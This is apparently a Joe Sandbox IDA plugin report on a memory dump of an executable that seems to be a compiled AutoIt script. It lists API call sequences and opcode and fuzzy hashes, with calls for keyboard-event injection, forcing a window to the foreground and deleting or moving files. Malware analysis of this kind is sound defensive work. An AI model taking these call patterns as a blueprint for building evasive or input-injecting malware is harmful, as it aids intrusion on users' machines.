                          • Instruction Fuzzy Hash: DAF058712402159BD314EB69D445BA6BBE8AF58320F0005AAF81AD72A2DF70A800CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B084A6: __swprintf.LIBCMT ref: 00B084E5
                            • Part of subcall function 00B084A6: __itow.LIBCMT ref: 00B08519
                          • __wcsnicmp.LIBCMT ref: 00B083C4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: __itow__swprintf__wcsnicmp
                          • String ID:
                          • API String ID: 712828618-0
                          • Opcode ID: d34b9a7776e0dbde454395f289cf0baad1fac1067582301f0ea67cce82e9bae9
                          • Instruction ID: 7ac62f875db8f87f5ac2c2d7c531c5322911f87d507819707680f3320192b20f
                          • Opcode Fuzzy Hash: d34b9a7776e0dbde454395f289cf0baad1fac1067582301f0ea67cce82e9bae9
                          • Instruction Fuzzy Hash: E3F16B71508302AFC704DF18C89186EBBE5FF98344F5489ADF999973A1EB30EA45CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                          • Instruction ID: 995695fa2688946f0b0796e1b2b1a8fc1c44f2b015429f0551bcef6af0ece427
                          • Opcode Fuzzy Hash: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                          • Instruction Fuzzy Hash: 9D61B374A00206AFCB00DF55C8C4ABAF7E5FF18310F9482A9E929D7291D730EDA5CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7833f2e7c3d6235f090831a7bb8901458a7f75807a1f42291a167c6149d5afe6
                          • Instruction ID: 8ec588211c34b4224faa5e8b10b757dd3f4e343af4fcc2ce64831c6aeb58ac66
                          • Opcode Fuzzy Hash: 7833f2e7c3d6235f090831a7bb8901458a7f75807a1f42291a167c6149d5afe6
                          • Instruction Fuzzy Hash: 13519135600514AFCF14EF68C991EBE7BE6AF48310B1481E9FA1A9B2D2DB30ED45DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                          • Instruction ID: e5ae7d81e84c7b648e7a154717690ad70edcef4dbcd93ddf8ed852618376ceab
                          • Opcode Fuzzy Hash: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                          • Instruction Fuzzy Hash: 29417B792006029FC7249F19D491962FBE1FF89361714C4AAE99A8B7A1DB30EC61CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00B04F8F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: select
                          • String ID:
                          • API String ID: 1274211008-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B03F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00B03F90
                          • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00B034E2,?,00000001), ref: 00B03FCD
                            • Part of subcall function 00B03E78: FreeLibrary.KERNEL32(00000000), ref: 00B03EAB
                            • Part of subcall function 00B04010: _memmove.LIBCMT ref: 00B0405A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Library$Free$Load_memmove
                          • String ID:
                          • API String ID: 3640140200-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,00000000,00000000,?,00B04E69,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00B04CF7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CharUpperBuffW.USER32(00000000,?,00000000,?,?,?,00B05A39,?,?,?,-00000003,00000000,00000000), ref: 00B0514E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: BuffCharUpper
                          • String ID:
                          • API String ID: 3964851224-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • WSAStartup.WS2_32(00000202,?), ref: 00B595C9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Startup
                          • String ID:
                          • API String ID: 724789610-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • FreeLibrary.KERNEL32(?,?,?,?,?,00B034E2,?,00000001), ref: 00B03E6D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00B47A11
                            • Part of subcall function 00B07E53: _memmove.LIBCMT ref: 00B07EB9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: FolderPath_memmove
                          • String ID:
                          • API String ID: 3334745507-0
                          • Opcode ID: c3f56ffb3da090cebcd7716108d1c07336a6e6fe4e1fb57a9ec0d804eaa48d32
                          • Instruction ID: 682c42433937f84b4e3228cf9b7e6dac96b613f0d95d8423626835077a97a2b5
                          • Opcode Fuzzy Hash: c3f56ffb3da090cebcd7716108d1c07336a6e6fe4e1fb57a9ec0d804eaa48d32
                          • Instruction Fuzzy Hash: 1FD05EA66002282FDB50E6249C09DFB76ADC744144F0002E1786DD2192ED20AE4587E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • FindCloseChangeNotification.KERNEL32(?,?,?,00B75950), ref: 00B0510C
                          Similarity
                          • API ID: ChangeCloseFindNotification
                          • String ID:
                          • API String ID: 2591292051-0
                          • Opcode ID: 9a1ef020ee95efed2399985bf4912c02c3e12d384e5a37e6dd41f9b75306da92
                          • Instruction ID: 61d10240895eb03eadd0cb1043d646b94affa6c847e5bb9b59e0cf0d60172459
                          • Opcode Fuzzy Hash: 9a1ef020ee95efed2399985bf4912c02c3e12d384e5a37e6dd41f9b75306da92
                          • Instruction Fuzzy Hash: D1E09275400A02CBC2315F1AA804417FBE5EEE13613218A6FD0E592AA0DBB15886DF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B46623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,00B4685E,?,?,?,00B74A5C,00B9E448,00000003,?,?), ref: 00B466E2
                          • WriteFile.KERNEL32(?,?,00BC22E8,00000000,00000000,?,?,?,00B74A5C,00B9E448,00000003,?,?,00B04C44,?,?), ref: 00B4686C
                          Similarity
                          • API ID: File$PointerWrite
                          • String ID:
                          • API String ID: 539440098-0
                          • Opcode ID: 056b9d5aa9950ef8ce8ddad1aa844a3de554c3d1086e23f032daa3ba8d7eb3ea
                          • Instruction ID: 2107975da066652f44e9926b1287dbaa91d6b0687b3160ccd888bc4ff48ad415
                          • Opcode Fuzzy Hash: 056b9d5aa9950ef8ce8ddad1aa844a3de554c3d1086e23f032daa3ba8d7eb3ea
                          • Instruction Fuzzy Hash: 30E04636000208BBDB20AF94D805FCABBB8EF04310F00051AF941A2050D7B1AB14DBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B01952
                          Similarity
                          • API ID: MessageSendTimeout
                          • String ID:
                          • API String ID: 1599653421-0
                          • Opcode ID: f2ccacf4220798cca5c7b73dbbfc894d50058981d5ad4f8ee4d225f569ef33ed
                          • Instruction ID: f0cb1643261655ff3e9a14c53e3ca59b9dd29ea08067c5287fb9cfdfbad2000d
                          • Opcode Fuzzy Hash: f2ccacf4220798cca5c7b73dbbfc894d50058981d5ad4f8ee4d225f569ef33ed
                          • Instruction Fuzzy Hash: 82D012F169020C7EFB008761CD07DBB776CD721F81F0046617E06D64D1DA64DE098670
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B0193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B01952
                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B3E3AA
                          Similarity
                          • API ID: MessageSend$Timeout
                          • String ID:
                          • API String ID: 1777923405-0
                          • Opcode ID: f59c913557bbef9c7ef762785e53661b19bbf6e6845d12fea20f7dac67ea47e0
                          • Instruction ID: 91f79989959c0958ec15083ab3d95dae190e5d1bcae9068e666b3ecc0a4cdd5d
                          • Opcode Fuzzy Hash: f59c913557bbef9c7ef762785e53661b19bbf6e6845d12fea20f7dac67ea47e0
                          • Instruction Fuzzy Hash: 75D01231144110AAFA716B18FC06FC17BD2DB41750F21089AB580670E5D6D25C519644
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Similarity
                          • API ID: TextWindow
                          • String ID:
                          • API String ID: 530164218-0
                          • Opcode ID: 1eed811faab349719bdf7891ffa48ab4cf3f3eca5f67281fd63c77e6ab5711ac
                          • Instruction ID: 042a7e98abcb964949489ba2947cfaba8a64895f3093a48d2e348edb17dacdef
                          • Opcode Fuzzy Hash: 1eed811faab349719bdf7891ffa48ab4cf3f3eca5f67281fd63c77e6ab5711ac
                          • Instruction Fuzzy Hash: 2AD067362105149F8701EB99D844C897BE9FF5D6103058492F5499B271DA21ED509B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,00B749DA,?,?,00000000), ref: 00B04FC4
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: 519bbc9c4400e77ba5ceafd26741f866efe732d2515b362fc8f2a8fd22d2bb94
                          • Instruction ID: 69e6b526b07df07a86f8e152100909f4ac8b6bf0d9e8f9242d8dab602f3c213f
                          • Opcode Fuzzy Hash: 519bbc9c4400e77ba5ceafd26741f866efe732d2515b362fc8f2a8fd22d2bb94
                          • Instruction Fuzzy Hash: 68D0C974640208BFEB00DB91DC4AF9A7BBCEB04718F600194F600A62E0D6F2BE408B55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                          • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 00B6F64E
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B6F6AD
                          • GetWindowLongW.USER32(?,000000F0), ref: 00B6F6EA
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B6F711
                          • SendMessageW.USER32 ref: 00B6F737
                          • _wcsncpy.LIBCMT ref: 00B6F7A3
                          • GetKeyState.USER32(00000011), ref: 00B6F7C4
                          • GetKeyState.USER32(00000009), ref: 00B6F7D1
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B6F7E7
                          • GetKeyState.USER32(00000010), ref: 00B6F7F1
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B6F820
                          • SendMessageW.USER32 ref: 00B6F843
                          • SendMessageW.USER32(?,00001030,?,00B6DE69), ref: 00B6F940
                          • SetCapture.USER32(?), ref: 00B6F970
                          • ClientToScreen.USER32(?,?), ref: 00B6F9D4
                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00B6F9FA
                          • ReleaseCapture.USER32 ref: 00B6FA05
                          • GetCursorPos.USER32(?), ref: 00B6FA3A
                          • ScreenToClient.USER32(?,?), ref: 00B6FA47
                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B6FAA9
                          • SendMessageW.USER32 ref: 00B6FAD3
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B6FB12
                          • SendMessageW.USER32 ref: 00B6FB3D
                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B6FB55
                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B6FB60
                          • GetCursorPos.USER32(?), ref: 00B6FB81
                          • ScreenToClient.USER32(?,?), ref: 00B6FB8E
                          • GetParent.USER32(?), ref: 00B6FBAA
                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B6FC10
                          • SendMessageW.USER32 ref: 00B6FC40
                          • ClientToScreen.USER32(?,?), ref: 00B6FC96
                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B6FCC2
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B6FCEA
                          • SendMessageW.USER32 ref: 00B6FD0D
                          • ClientToScreen.USER32(?,?), ref: 00B6FD57
                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B6FD87
                          • GetWindowLongW.USER32(?,000000F0), ref: 00B6FE1C
                          Strings
                          Similarity
                          • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                          • String ID: @GUI_DRAGID$F
                          • API String ID: 3461372671-4164748364
                          • Opcode ID: f1238d591dc2eb7a62bbbe177280595f1671571e47d7c7379867ad6f5b4a0488
                          • Instruction ID: 5e58f5c74488cca5206938a8a13501dd0ee322d7083984e9af1a316495e681f0
                          • Opcode Fuzzy Hash: f1238d591dc2eb7a62bbbe177280595f1671571e47d7c7379867ad6f5b4a0488
                          • Instruction Fuzzy Hash: D632EE71604206AFDB20DF68D884EBABBE5FF49318F144AA9F655872B1DB35EC00CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00B6AFDB
                          Strings
                          Similarity
                          • API ID: MessageSend
                          • String ID: %d/%02d/%02d
                          • API String ID: 3850602802-328681919
                          • Opcode ID: a9878a4aa89e90ffb39a9fe89287ce7ef5252fa4fa3057ccd89a28a7f355a371
                          • Instruction ID: 4db5b72190491bc1c8c1e8134c9ae0b138831c78237afd0e0b2c591e710315fb
                          • Opcode Fuzzy Hash: a9878a4aa89e90ffb39a9fe89287ce7ef5252fa4fa3057ccd89a28a7f355a371
                          • Instruction Fuzzy Hash: 91129D71500218ABEF259F64DC89FAA7BE8FB45310F14429AF519EB2E1DB788941CF12
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetForegroundWindow.USER32(00000000,00000000), ref: 00B1F796
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B74388
                          • IsIconic.USER32(000000FF), ref: 00B74391
                          • ShowWindow.USER32(000000FF,00000009), ref: 00B7439E
                          • SetForegroundWindow.USER32(000000FF), ref: 00B743A8
                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B743BE
                          • GetCurrentThreadId.KERNEL32 ref: 00B743C5
                          • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00B743D1
                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00B743E2
                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00B743EA
                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 00B743F2
                          • SetForegroundWindow.USER32(000000FF), ref: 00B743F5
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B7440A
                          • keybd_event.USER32(00000012,00000000), ref: 00B74415
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B7441F
                          • keybd_event.USER32(00000012,00000000), ref: 00B74424
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B7442D
                          • keybd_event.USER32(00000012,00000000), ref: 00B74432
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B7443C
                          • keybd_event.USER32(00000012,00000000), ref: 00B74441
                          • SetForegroundWindow.USER32(000000FF), ref: 00B74444
                          • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00B7446B
                          Strings
                          Similarity
                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                          • String ID: Shell_TrayWnd
                          • API String ID: 4125248594-2988720461
                          • Opcode ID: f5f13de56b7f68a74aba4515f6d163ce77c1071386371a8a1821dabe8a11535a
                          • Instruction ID: e299e7f0d2d0608af4fe23cea99821dafcef33ee0540bb796d4cef2e506b2720
                          • Opcode Fuzzy Hash: f5f13de56b7f68a74aba4515f6d163ce77c1071386371a8a1821dabe8a11535a
                          • Instruction Fuzzy Hash: BB316971A40218BBEB216B719C49FBF7FACEB44B50F114056FA19A71E0DBB05D01EB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00BC22E8,?,00000000,?,00B03E2E,?,00000000,?,00B9DBF0,00000000,?), ref: 00B0BE8B
                          • GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00B03E2E,?,00000000,?,00B9DBF0,00000000,?,00000002), ref: 00B0BEA7
                          • __wsplitpath.LIBCMT ref: 00B0BF19
                            • Part of subcall function 00B2297D: __wsplitpath_helper.LIBCMT ref: 00B229BD
                          • _wcscpy.LIBCMT ref: 00B0BF31
                          • _wcscat.LIBCMT ref: 00B0BF46
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B0BF56
                          • _wcscpy.LIBCMT ref: 00B0C03E
                          • _wcscpy.LIBCMT ref: 00B0C1ED
                          • SetCurrentDirectoryW.KERNEL32 ref: 00B0C250
                            • Part of subcall function 00B2010A: std::exception::exception.LIBCMT ref: 00B2013E
                            • Part of subcall function 00B2010A: __CxxThrowException@8.LIBCMT ref: 00B20153
                            • Part of subcall function 00B0C320: _memmove.LIBCMT ref: 00B0C419
                          Strings
                          Similarity
                          • API ID: CurrentDirectory_wcscpy$_memmove$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_wcscatstd::exception::exception
                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string$_
                          • API String ID: 2542276039-689609797
                          • Opcode ID: 979717687cd865f5cec7f6c208d9b3ec4e407867fc80ff5ce49a77107f857ad5
                          • Instruction ID: 625c26093e08772098ec3534f8ddce6dfe3a39239eb0c79e41d1a2f12a9da907
                          • Opcode Fuzzy Hash: 979717687cd865f5cec7f6c208d9b3ec4e407867fc80ff5ce49a77107f857ad5
                          • Instruction Fuzzy Hash: AC42C4715083419FD710EF60C881BABBBE8EF94300F0449ADF59997292DB71EA49DB93
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B031B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00B031DA
                            • Part of subcall function 00B47B9F: __wsplitpath.LIBCMT ref: 00B47BBC
                            • Part of subcall function 00B47B9F: __wsplitpath.LIBCMT ref: 00B47BCF
                            • Part of subcall function 00B47C0C: GetFileAttributesW.KERNEL32(?,00B46A7B), ref: 00B47C0D
                          • _wcscat.LIBCMT ref: 00B46B9D
                          • _wcscat.LIBCMT ref: 00B46BBB
                          • __wsplitpath.LIBCMT ref: 00B46BE2
                          • FindFirstFileW.KERNEL32(?,?), ref: 00B46BF8
                          • _wcscpy.LIBCMT ref: 00B46C57
                          • _wcscat.LIBCMT ref: 00B46C6A
                          • _wcscat.LIBCMT ref: 00B46C7D
                          • lstrcmpiW.KERNEL32(?,?), ref: 00B46CAB
                          • DeleteFileW.KERNEL32(?), ref: 00B46CBC
                          • MoveFileW.KERNEL32(?,?), ref: 00B46CDB
                          • MoveFileW.KERNEL32(?,?), ref: 00B46CEA
                          • CopyFileW.KERNEL32(?,?,00000000), ref: 00B46CFF
                          • DeleteFileW.KERNEL32(?), ref: 00B46D10
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B46D37
